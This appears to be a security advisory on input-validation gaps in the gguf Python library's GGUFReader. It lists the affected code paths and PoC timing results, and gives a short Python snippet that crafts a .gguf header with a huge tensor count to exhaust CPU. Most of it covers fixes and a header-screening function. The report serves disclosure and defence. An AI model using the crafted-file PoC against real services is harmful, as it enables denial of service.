gguf Python Library Validation Bypass - CVSS 5.5 (Medium)
Target: gguf (PyPI), v0.19.0
CWE: CWE-20 (Improper Input Validation) / CWE-400 (Uncontrolled Resource Consumption)
CVSS 3.1: AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H (5.5)
Vulnerability Summary
The gguf Python library's GGUFReader performs no upper-bound validation on count/size fields in the GGUF binary format header, allowing crafted .gguf files to cause CPU exhaustion and memory amplification.
Vulnerable Code Paths (gguf_reader.py)
| # | Code Location | Issue |
|---|---|---|
| 1 | `_build_tensor_info()` line 312 | `for _ in range(tensor_count)`: uint64, no upper bound |
| 2 | `_build_fields()` line 289 | `for _ in range(kv_count)`: uint64, no upper bound |
| 3 | `_get_field_parts()` line 247 | `for idx in range(alen[0])`: uint64, no upper bound |
| 4 | `_get_str()` line 218 | `self._get(offset+8, np.uint8, slen[0])`: uint64 length |
| 5 | `_build_tensors()` line 329 | `n_elems = int(np.prod(dims))`: uint64 overflow |
Protected Behaviors (Defenses)
| # | Issue | Status |
|---|---|---|
| 1 | Duplicate tensor names | PROTECTED - explicit check line 326 |
| 2 | Duplicate KV keys | PROTECTED - explicit check line 208 |
| 3 | Integer overflow exploit | MITIGATED - NumPy reshape catches size mismatch |
| 4 | Data offset past EOF | MITIGATED - reshape catches size mismatch |
PoC Results
| Attack Vector | Size | Iterations | CPU Time |
|---|---|---|---|
| tensor_count = 500,000 | 19 MB | 500k | 25.5s |
| kv_count = 500,000 | 10 MB | 500k | 14.5s |
| ARRAY alen = 1,000,000 | 1 MB | 1M | 7.1s |
| Combined: 10k KV × 1k ARRAY | 10 MB | 10M | 67s |
| String key 50MB | 48 MB | - | +95 MB RSS |
| Zero-dim tensor [0,0] | <1 KB | - | Accepted silently |
Reproduction
```python
# PoC 1: CPU DoS via 500k tensors
import struct, tempfile
from gguf.gguf_reader import GGUFReader

# Build crafted file
data = struct.pack('<I', 0x46554747)    # magic
data += struct.pack('<I', 3)            # version
data += struct.pack('<QQ', 500000, 0)   # tensor_count=500k, kv_count=0
# + 500k tensor entries + padding + data
# Full PoC: see poc_gguf_bypass.py

tmp = tempfile.NamedTemporaryFile(suffix='.gguf', delete=False)
tmp.write(data)
tmp.close()
reader = GGUFReader(tmp.name, mode='r')  # ~25s CPU for 19MB file
```
Fix Recommendations
- Add upper bounds to all count fields:

```python
MAX_TENSOR_COUNT = 100_000
MAX_KV_COUNT = 100_000
MAX_ARRAY_LENGTH = 1_000_000
MAX_STRING_LENGTH = 10_000_000  # 10 MB
MAX_DIM_COUNT = 16
MAX_DIM_VALUE = 2**31 - 1

if tensor_count > MAX_TENSOR_COUNT:
    raise ValueError(f"tensor_count {tensor_count} exceeds maximum {MAX_TENSOR_COUNT}")
```

- Validate string length before allocation (in `_get_str()`):

```python
def _get_str(self, offset):
    slen = self._get(offset, np.uint64)
    if slen[0] > MAX_STRING_LENGTH:
        raise ValueError(f"String length {slen[0]} exceeds maximum")
    return slen, self._get(offset + 8, np.uint8, slen[0])
```

- Validate tensor dimensions (in `_build_tensors()`):

```python
if n_dims > MAX_DIM_COUNT:
    raise ValueError(f"Dimension count {n_dims} exceeds maximum")
if any(d > MAX_DIM_VALUE for d in dims):
    raise ValueError("Dimension value exceeds maximum")
if any(d == 0 for d in dims):
    raise ValueError("Zero dimension not allowed")
```

- Validate n_elems against uint64 limits:

```python
n_elems = int(np.prod(dims.astype(np.float64)))  # Use float64 to detect overflow
if n_elems > 2**63:
    raise ValueError(f"Total elements {n_elems} exceeds safe limit")
```
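Until the library enforces such limits, a caller can screen untrusted files before passing them to GGUFReader. The following is an added example, not code from the gguf project or from this report: the function names and the minimum entry sizes are assumptions (the sizes are derived from the GGUF tensor-info and key/value layouts), while the header layout and the two count limits are taken from the PoC and the recommendations above.

```python
import os
import struct

GGUF_MAGIC = 0x46554747          # magic value used in the PoC above
MAX_TENSOR_COUNT = 100_000       # limits proposed in the fix recommendations
MAX_KV_COUNT = 100_000
# Assumed smallest possible on-disk entries (empty name/key, zero dims):
MIN_TENSOR_ENTRY = 24            # name len(8) + n_dims(4) + type(4) + offset(8)
MIN_KV_ENTRY = 13                # key len(8) + value type(4) + 1-byte value
# Little-endian header as packed in the PoC: magic, version, tensor_count, kv_count
HEADER = struct.Struct("<IIQQ")


def check_gguf_header(header: bytes, file_size: int) -> list[str]:
    """Return reasons to reject the file; an empty list means the header passed."""
    if len(header) < HEADER.size:
        return [f"file shorter than the {HEADER.size}-byte GGUF header"]
    magic, _version, tensor_count, kv_count = HEADER.unpack_from(header)
    if magic != GGUF_MAGIC:
        return [f"bad magic 0x{magic:08x}"]

    problems = []
    if tensor_count > MAX_TENSOR_COUNT:
        problems.append(f"tensor_count {tensor_count} exceeds {MAX_TENSOR_COUNT}")
    if kv_count > MAX_KV_COUNT:
        problems.append(f"kv_count {kv_count} exceeds {MAX_KV_COUNT}")
    # Plausibility: the declared entries cannot occupy more bytes than the file has.
    needed = HEADER.size + tensor_count * MIN_TENSOR_ENTRY + kv_count * MIN_KV_ENTRY
    if needed > file_size:
        problems.append(f"counts need at least {needed} bytes, file has {file_size}")
    return problems


def check_gguf_file(path: str) -> list[str]:
    """Read only the fixed-size header, so the check itself costs O(1)."""
    with open(path, "rb") as fh:
        return check_gguf_header(fh.read(HEADER.size), os.path.getsize(path))
```

The size plausibility test alone does not stop the 19 MB PoC file, whose 500k entries fit in the file; the hard caps do. Array and string lengths inside KV entries still need the per-field limits listed above.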